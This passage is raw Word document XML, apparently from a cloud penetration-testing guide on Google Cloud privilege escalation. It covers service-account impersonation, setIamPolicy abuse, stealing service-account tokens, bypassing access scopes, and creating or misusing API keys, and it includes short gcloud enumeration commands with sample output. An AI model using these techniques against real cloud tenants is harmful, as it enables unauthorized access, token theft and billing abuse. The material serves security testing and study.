        <w:t xml:space="preserve"> (also, the exploitation the vulnerabilities to get more permissions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCCB9C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Therefore, I would like to separate GCP privilege escalation techniques in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2 groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BD792" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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proofErr w:type="spell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Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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to a principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: This will allow you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impersonate another principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and therefore act like it with all his permissions. e.g.: Abuse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>getAccessToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to impersonate a service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29C2D8" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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proofErr w:type="spell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Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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on the resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: This will allow you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get more permissions over the specific resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. e.g.: you can abuse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>cloudfunctions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow you to trigger the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024CB43" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Note that some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resources permissions will also allow you to attach an arbitrary service account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and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steal the SA token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96874E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Obviously, the most interesting privilege escalation techniques are the ones of the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second group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it will allow you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get more privileges outside of the resources you already have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> some privileges over. However, note that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escalating in resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> may give you also access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sensitive information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or even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other principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (maybe via reading a secret that contains a token of a SA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD19D7F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It's important to note also that in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GCP Service Accounts are both principals and permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, so escalating privileges in a SA will allow you to impersonate it also.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4793C2D0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permissions between parenthesis indicate the permissions needed to exploit the vulnerability with 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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Those might not be needed if exploiting it through the API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA58FD0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Permissions for Privilege Escalation Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AE7C5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is how I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test for specific permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform specific actions inside GCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA35CD" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Download the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repo </w:t>
      </w:r>
      <w:hyperlink r:id="rId74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https://github.com/carlospolop/gcp_privesc_scripts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F1ECD04" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Add in tests/ the new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BAC0099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Bypassing access scopes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709FC805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Tokens of SA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>leakded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from GCP metadata service have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access scopes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are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restrictions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the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permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the token has. For example, if the token has the </w:t>
      </w:r>
      <w:r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https://www.googleapis.com/auth/cloud-platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope, it will have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full access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to all GCP services. However, if the token has the </w:t>
      </w:r>
      <w:r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https://www.googleapis.com/auth/cloud-platform.read-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope, it will only have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read-only access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to all GCP services even if the SA has more permissions in IAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC94ADF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There is no direct way to bypass these permissions, but you could always try searching for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new credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the compromised host,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find the service key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate an OAuth token without restriction or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jump to a different VM less restricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A2BF3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When </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:anchor="accesscopesiam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access scopes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used, the OAuth token that is generated for the computing instance (VM) will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have a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia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scope</w:t>
        </w:r>
      </w:hyperlink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limitation included</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, you might be able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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> this limitation and exploit the permissions the compromised account has.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584C212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best way to bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> this restriction is either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find new credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the compromised host,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find the service key to generate an OAuth token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> without restriction or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compromise a different VM with a SA less restricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116209B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SA with keys generated with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ED9BA6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E78F1C5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for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in $(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service-accounts list --format="table[no-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heading](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email)"); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFCA7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echo "Looking for keys for $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:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466FE0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service-accounts keys list --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-account $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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E2C920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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC2DC7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Privilege Escalation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A50D87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way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804AC8A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GCP has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hundreds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if not thousands) of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permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that an entity can be granted. In this book you can find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all the permissions that I know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that you can abuse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escalate privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, but if you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know some path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> not mentioned here,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please share it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C0253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The subpages of this section are ordered by services. You can find on each service different ways to escalate privileges on the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1FBFA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 xml:space="preserve">Abusing GCP to escalate privileges </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>locally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CBC66C8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you are inside a machine in GCP you might be able to abuse permissions to escalate privileges even locally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BFF301" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77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GCP - local privilege escalation </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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ssh</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 pivoting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68DA3A03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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F07E54" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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78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https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="232B0BF3" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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79" w:anchor="gcp-privesc-scanner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https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45761BEE" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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80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https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09F4DE65" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="0DCCFF18" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="3D918707" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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 xml:space="preserve">GCP - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Apikeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="675BD548" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E06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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Apikeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49121AE0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following permissions are useful to create and steal API keys, not this from the docs: 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 xml:space="preserve">An API key is a simple encrypted string that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>identifies an application without any principal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 xml:space="preserve">. They are useful for accessing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">public data </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>anonymously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>, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> are used to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>associate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 xml:space="preserve"> API requests with your project for quota and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>billing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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DD68B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Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C842B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more information about API Keys check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA707CA" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27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 - API Keys Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EE2A3A2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other ways to create API keys check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC3825" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27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GCP - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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Serviceusage</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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Privesc</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24F2C96C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lastRenderedPageBreak/>
        <w:t>Brute Force API Key access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125EFF5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As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia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https://github.com/ozguralp/gmapsapiscanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check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what you can access with the API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773348F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apikeys.keys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.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19B458BF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permission allows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create an API key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD6889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B601EB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services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api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-keys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create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51884A1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Operation [operations/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akmf.p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7-[...]9] complete. Result: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F6A36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"@type":"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type.googleapis.com/google.api.apikeys.v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2.Key",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA7E3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"createTime":"2022-01-26T12:23:06.281029Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA0EA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etag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":"W/\"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HOhA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[...]==\"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361004DD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keyString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AIzaSy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[...]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oU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",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F976BFA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name":"projects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/5[...]6/locations/global/keys/f707[...]e8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16198F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"uid":"f707[...]e8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF3E37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"updateTime":"2022-01-26T12:23:06.378442Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862B7D2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14:paraId="5E32C615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find a script to automate the </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia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creation, exploit and cleaning of a vuln environment here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5CE608D1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Note that by default users have permissions to create new projects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>adn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
